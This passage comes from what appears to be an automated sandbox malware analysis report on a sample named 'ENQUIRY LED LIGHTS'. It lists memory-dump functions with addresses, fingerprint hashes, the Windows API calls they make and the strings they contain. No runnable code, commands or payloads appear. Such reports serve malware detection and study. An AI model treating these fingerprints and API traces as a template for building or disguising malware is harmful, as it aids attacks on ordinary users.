                                                                                                  • Instruction Fuzzy Hash: E690026160540412D1407158941C7170025C7D0281F55D015A5024554DC65A8B5966A1
                                                                                                  Function 02F52CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 76d3ccb86599757541a390ee8cd277f961292a48bb826774922335713879f99b
                                                                                                  • Instruction ID: 8421f33f877c92231958ca8f8683003d0eeb83b032a886136bbe4de2745051d1
                                                                                                  • Opcode Fuzzy Hash: 76d3ccb86599757541a390ee8cd277f961292a48bb826774922335713879f99b
                                                                                                  • Instruction Fuzzy Hash: 2F90027120140412D1007598940C6570015C7E0381F55D015AA024555EC66689956131
                                                                                                  Function 02F52C60 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f2595d08a3223cc164e93f57da595dc0c5d5793f6ac4a91a81c3786c3133c8c
                                                                                                  • Instruction ID: acaae6db2da403c1e81e37ec00a15c72a62e9c881751211d3641264d7ba62c56
                                                                                                  • Opcode Fuzzy Hash: 8f2595d08a3223cc164e93f57da595dc0c5d5793f6ac4a91a81c3786c3133c8c
                                                                                                  • Instruction Fuzzy Hash: 2D90027120140852D10071588408B570015C7E0381F55C01AA5124654D8616C9557521
                                                                                                  Function 02F52DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0524a7b57e32530b5ae53d74c633eea137bfa368f46802b485188d2c2c8f75c7
                                                                                                  • Instruction ID: fbd9fb9a67eff717a572840efb762a46119cbad8cc9e67c7cf4abb594d2e2e51
                                                                                                  • Opcode Fuzzy Hash: 0524a7b57e32530b5ae53d74c633eea137bfa368f46802b485188d2c2c8f75c7
                                                                                                  • Instruction Fuzzy Hash: F2900261242441625545B15884085174016D7E02C1795C016A6414950C8527995AD621
                                                                                                  Function 02F52DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 574d4e2357532cdb37865fa5d43b0b3a0fdba592834e6418d2e97eb19e407123
                                                                                                  • Instruction ID: ba46e620d97fbc926945d9404a6a4e9c09852696d5aa67c756f5d6369b79bbfd
                                                                                                  • Opcode Fuzzy Hash: 574d4e2357532cdb37865fa5d43b0b3a0fdba592834e6418d2e97eb19e407123
                                                                                                  • Instruction Fuzzy Hash: A990027124140412D141715884086170019D7D02C1F95C016A5424554E86568B5AAA61
                                                                                                  Function 02F52D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d9bc3e9d8f36fa06742cb7895451e3207e2d1d98f96e85bf6a8ddf1b0cdb7361
                                                                                                  • Instruction ID: 11cfc40db8c3f365a32ca68d748a5bd454f28d296ea1a24a8e4371d0847b5671
                                                                                                  • Opcode Fuzzy Hash: d9bc3e9d8f36fa06742cb7895451e3207e2d1d98f96e85bf6a8ddf1b0cdb7361
                                                                                                  • Instruction Fuzzy Hash: A990047130140013D140715CD41C7174015D7F13C1F55D015F5414554CDD17CD5F5333
                                                                                                  Function 02F52D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1669be1f1cf2bf50b22a71ea46eb3b62669b63e3abb6cd7b59ab893d7810dd8b
                                                                                                  • Instruction ID: 96308e0ac40de5f86d689363c3d995bf5989ffa7ee85d3cb1980ba4f6b8da76a
                                                                                                  • Opcode Fuzzy Hash: 1669be1f1cf2bf50b22a71ea46eb3b62669b63e3abb6cd7b59ab893d7810dd8b
                                                                                                  • Instruction Fuzzy Hash: 8690026921340012D1807158940C61B0015C7D1282F95D419A5015558CC916896D5321
                                                                                                  Function 02F52D00 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89a0e25cd228ff4a20df77647017d8b8d75ecdcfbca1248cbd1e5343262d8444
                                                                                                  • Instruction ID: 0d5828e29a9892467a95af9f9d1ef44213c049c6d5aa50e15c9cf7f104a10704
                                                                                                  • Opcode Fuzzy Hash: 89a0e25cd228ff4a20df77647017d8b8d75ecdcfbca1248cbd1e5343262d8444
                                                                                                  • Instruction Fuzzy Hash: A490026120544452D1007558940CA170015C7D0285F55D015A6064595DC6368955A131
                                                                                                  Function 02F53090 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b2e945f44f3c3265e335aa30fcb25e3e89bdbc718d2cd7891f6d2b73dab6d696
                                                                                                  • Instruction ID: 080d8ca016d4df808dee411619149f5c3733e936a763323803c7b472b6c85866
                                                                                                  • Opcode Fuzzy Hash: b2e945f44f3c3265e335aa30fcb25e3e89bdbc718d2cd7891f6d2b73dab6d696
                                                                                                  • Instruction Fuzzy Hash: FE90026124140812D1407158C4187170016C7D0681F55C015A5024554D86178A6966B1
                                                                                                  Function 02F53010 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 498d9191ba27faffe7606ef0b215c2b4bbc40a1c176577567239842221f9147e
                                                                                                  • Instruction ID: c8f4dcfe18ffcf55ad2297bbf620292492ba67794fa1ee71389732023266e9c3
                                                                                                  • Opcode Fuzzy Hash: 498d9191ba27faffe7606ef0b215c2b4bbc40a1c176577567239842221f9147e
                                                                                                  • Instruction Fuzzy Hash: D490026120184452D14072588808B1F4115C7E1282F95C01DA9156554CC91689595721
                                                                                                  Function 02F539B0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5b8d1bc2bb6f9fc972a14b83de10a8462844183e3bfc9902ec64e086c5eb8d61
                                                                                                  • Instruction ID: 703f796adefde469630e8ee17b7b50a2cb1dbb01344348471de833ab7be89e05
                                                                                                  • Opcode Fuzzy Hash: 5b8d1bc2bb6f9fc972a14b83de10a8462844183e3bfc9902ec64e086c5eb8d61
                                                                                                  • Instruction Fuzzy Hash: ED90026124545112D150715C84086274015E7E0281F55C025A5814594D855689596221
                                                                                                  Function 02F53D70 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b1b54ed5cb7a4f7b60eaf2429f77d6886ac6c0b2f39fd12eda5f296372a076f7
                                                                                                  • Instruction ID: b84bea7e75826dbf8fe38a14082a80bab8ac96625d4494859d3c881e793c1bfc
                                                                                                  • Opcode Fuzzy Hash: b1b54ed5cb7a4f7b60eaf2429f77d6886ac6c0b2f39fd12eda5f296372a076f7
                                                                                                  • Instruction Fuzzy Hash: F990027520140412D510715898086570056C7D0381F55D415A5424558D865589A5A121
                                                                                                  Function 02F53D10 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f4099f79d7ffa18baddd406db7e99d4cf582603ec029458bd44b0abcc8e9ef0
                                                                                                  • Instruction ID: 812846fd0f04a475e4a5a0567aa0aa9f842250a88eed3d5127301c5f905890ef
                                                                                                  • Opcode Fuzzy Hash: 0f4099f79d7ffa18baddd406db7e99d4cf582603ec029458bd44b0abcc8e9ef0
                                                                                                  • Instruction Fuzzy Hash: 5290027120240152954072589808A5F4115C7E1382B95D419A5015554CC91589655221
                                                                                                  Function 02F52C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction ID: a7d9f9aeb24a2ccb762b919ed32961357848d849abd12432972c88c8d17a7d5a
                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Function 02F52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                                  • Instruction ID: 63427479568e4741da062ac045f815e4d75df8d6dd93f94952f8b71f7b9f34c6
                                                                                                  • Opcode Fuzzy Hash: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                                  • Instruction Fuzzy Hash: 5151E7B2E041267EDB10DB9888D097EF7B8FB08285710826AEF65D7641D734DE40DBA0
                                                                                                  Function 02FC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                                  • Instruction ID: 953fd86c738600ce16ea98f3201d61e1dcd6d66e1969d50a9844da6ee3ec64f6
                                                                                                  • Opcode Fuzzy Hash: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                                  • Instruction Fuzzy Hash: A751F675A00646AFDB20DE5CCE9097FB7F9EB44280B24885DEA96D7781DB74DA00CB60
                                                                                                  Function 00401000 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadStringW.USER32(?,00000067,0044F960,00000064), ref: 00401051
                                                                                                  • LoadStringW.USER32(?,0000006D,0044F898,00000064), ref: 0040105D
                                                                                                  • LoadAcceleratorsW.USER32(?,0000006D), ref: 004010AD
                                                                                                  • GetMessageW.USER32(?,00000724,00000724,00000724), ref: 004010F3
                                                                                                  • TranslateAcceleratorW.USER32(?,00007EE2,?), ref: 00401139
                                                                                                  • TranslateMessage.USER32(?), ref: 00401147
                                                                                                  • DispatchMessageW.USER32(?), ref: 00401171
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040119B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Load$StringTranslate$AcceleratorAcceleratorsDispatch
                                                                                                  • String ID: gfff$~
                                                                                                  • API String ID: 1345915193-1825384750
                                                                                                  • Opcode ID: 8beb378fd3a51ac1ad34f1906dbaecba7c4d607884ec947de0169e79efc7c170
                                                                                                  • Instruction ID: 70179e2be73fbd492f868be320fa11fb7035cfe0b5445c38df2d10b355de76e9
                                                                                                  • Opcode Fuzzy Hash: 8beb378fd3a51ac1ad34f1906dbaecba7c4d607884ec947de0169e79efc7c170
                                                                                                  • Instruction Fuzzy Hash: 1B51D571E00209ABDB18DFA5DC45AAEB7B9EB88341F10843AF501FB3D0D7799940CB94
                                                                                                  Function 02F47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F846FC
                                                                                                  • Execute=1, xrefs: 02F84713
                                                                                                  • ExecuteOptions, xrefs: 02F846A0
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F84787
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F84655
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F84742
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F84725
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: 549e9d94ba8a202a08063ad39c3cf2871d36bcb711daefdd24a947a618104325
                                                                                                  • Instruction ID: 475677172ea85d14dd970d9e3edcf698b640881e956b4e4e3a680c13bf293f51
                                                                                                  • Opcode Fuzzy Hash: 549e9d94ba8a202a08063ad39c3cf2871d36bcb711daefdd24a947a618104325
                                                                                                  • Instruction Fuzzy Hash: 6B510A31A4021DAAEF10BB64DC85FADBBBAEF05384F440199DB05AB190EBB19E45CF50
                                                                                                  Function 004011C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 125windowregistryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadIconW.USER32(?,0000006B), ref: 00401234
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00401244
                                                                                                  • LoadIconW.USER32(?,0000006C), ref: 00401333
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00401340
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load$Icon$ClassCursorRegister
                                                                                                  • String ID: -$0$m$ra
                                                                                                  • API String ID: 4202395251-3710693456
                                                                                                  • Opcode ID: 42c772a4f1075ba3e76194620bc0c66d5de01fbcba8f87aec38d4b47edb8bcc3
                                                                                                  • Instruction ID: e647448c091ad151782e848a6317f1ebaf9f09ea88818a99070cbd25200eb25d
                                                                                                  • Opcode Fuzzy Hash: 42c772a4f1075ba3e76194620bc0c66d5de01fbcba8f87aec38d4b47edb8bcc3
                                                                                                  • Instruction Fuzzy Hash: FE41B270E002099BDB18CF98CD546AEB7B5EB94305F14817EE505FF3E0E7799A018B84
                                                                                                  Function 0044989D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 004498A9
                                                                                                    • Part of subcall function 00447C6B: __getptd_noexit.LIBCMT ref: 00447C6E
                                                                                                    • Part of subcall function 00447C6B: __amsg_exit.LIBCMT ref: 00447C7B
                                                                                                  • __amsg_exit.LIBCMT ref: 004498C9
                                                                                                  • __lock.LIBCMT ref: 004498D9
                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004498F6
                                                                                                  • _free.LIBCMT ref: 00449909
                                                                                                  • InterlockedIncrement.KERNEL32(0044E570), ref: 00449921
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                  • String ID: pD
                                                                                                  • API String ID: 3470314060-1597287149
                                                                                                  • Opcode ID: c18de111d261a02e9d78a618057e181493686eba03027861f13b7e48fcf7f9db
                                                                                                  • Instruction ID: 89ee79b3f4413e9030944eb31c086c21d7e0273c601773af177f6511b9de2bde
                                                                                                  • Opcode Fuzzy Hash: c18de111d261a02e9d78a618057e181493686eba03027861f13b7e48fcf7f9db
                                                                                                  • Instruction Fuzzy Hash: B701AD71901611ABFB20AF6A9845B4F7760BB01724F14001FE814A7391CB3CAD82EBCD
                                                                                                  Function 00401537 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DefWindowProcW.USER32(00002BD0,?,?,?,00001935,00002430), ref: 004016B7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcWindow
                                                                                                  • String ID: 0$$2?$?$a$~
                                                                                                  • API String ID: 181713994-306211256
                                                                                                  • Opcode ID: 6a06743bac2c79e15e1384ce0a9ca747b2e44fd5330451f517784f179bc0247c
                                                                                                  • Instruction ID: 94f79d330af5a6ff8b02edf5650e35c16837e597272c529f5c364558b0b7ea09
                                                                                                  • Opcode Fuzzy Hash: 6a06743bac2c79e15e1384ce0a9ca747b2e44fd5330451f517784f179bc0247c
                                                                                                  • Instruction Fuzzy Hash: 6E41CE71A042014BD318CF2DCC5515AB6D6EBD8344F488A2EF489DB3E1E679D901CB85
                                                                                                  Function 02F5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-$0$0
                                                                                                  • API String ID: 1302938615-699404926
                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                  • Instruction ID: ad5eee0ab8ee7e2459de9838c15ab8b593a6f9835e034daa92600565d9c1450d
                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                  • Instruction Fuzzy Hash: CA81B370E052699EDF248E68C891BFEBBB2AF4539CF184199DF61A72D8C7349841CB50
                                                                                                  Function 02FC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                  • API String ID: 48624451-2819853543
                                                                                                  • Opcode ID: 52567c78f74250a21566b0cdb505fe527569cfd3ecc5b428cb4f594d7f48c5b0
                                                                                                  • Instruction ID: ad8fc672e18209812dc6963488ce7fecc131ea2e2de996826a1dcc40c73b3e7c
                                                                                                  • Opcode Fuzzy Hash: 52567c78f74250a21566b0cdb505fe527569cfd3ecc5b428cb4f594d7f48c5b0
                                                                                                  • Instruction Fuzzy Hash: F5213376E0011AABEB11DF79DD44ABEB7E9EF54788F54011AEE05D3240EB30D9018BA1
                                                                                                  Function 004010B8 Relevance: 7.6, APIs: 5, Instructions: 90windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetMessageW.USER32(?,00000724,00000724,00000724), ref: 004010F3
                                                                                                  • TranslateAcceleratorW.USER32(?,00007EE2,?), ref: 00401139
                                                                                                  • TranslateMessage.USER32(?), ref: 00401147
                                                                                                  • DispatchMessageW.USER32(?), ref: 00401171
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040119B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Translate$AcceleratorDispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 2755951552-0
                                                                                                  • Opcode ID: df0146169831fe10939060c871cc813313a4b69ef00d4bc3cf1595d362fbc48d
                                                                                                  • Instruction ID: ccd5ad3e59107f38b72d225a1cc96fb6a290095fc79c916f643b1647aaf79f05
                                                                                                  • Opcode Fuzzy Hash: df0146169831fe10939060c871cc813313a4b69ef00d4bc3cf1595d362fbc48d
                                                                                                  • Instruction Fuzzy Hash: 1E318271A002099BDB18DFA5DC45BAEB7B5EB88341F04853AE501EB390E738E941CB94
                                                                                                  Function 0044A16C Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0044A17A
                                                                                                    • Part of subcall function 0044A056: __FF_MSGBANNER.LIBCMT ref: 0044A06F
                                                                                                    • Part of subcall function 0044A056: __NMSG_WRITE.LIBCMT ref: 0044A076
                                                                                                    • Part of subcall function 0044A056: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00448F11,?,00000001,?,?,00448331,00000018,0044C900,0000000C,004483C1), ref: 0044A09B
                                                                                                  • _free.LIBCMT ref: 0044A18D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2734353464-0
                                                                                                  • Opcode ID: 79dcb828b78a649f943aeb3bbd224ae62308f47648f5163ebe310cd1aa835bde
                                                                                                  • Instruction ID: 314a4e8f7845280fe3a5fcdb36ad6d86006875dbe707586e3731efdec0b2d976
                                                                                                  • Opcode Fuzzy Hash: 79dcb828b78a649f943aeb3bbd224ae62308f47648f5163ebe310cd1aa835bde
                                                                                                  • Instruction Fuzzy Hash: DD112B36880101ABFB213B75AC0465F3B95AF513A1F20803FF81897291DF3CC85187AE
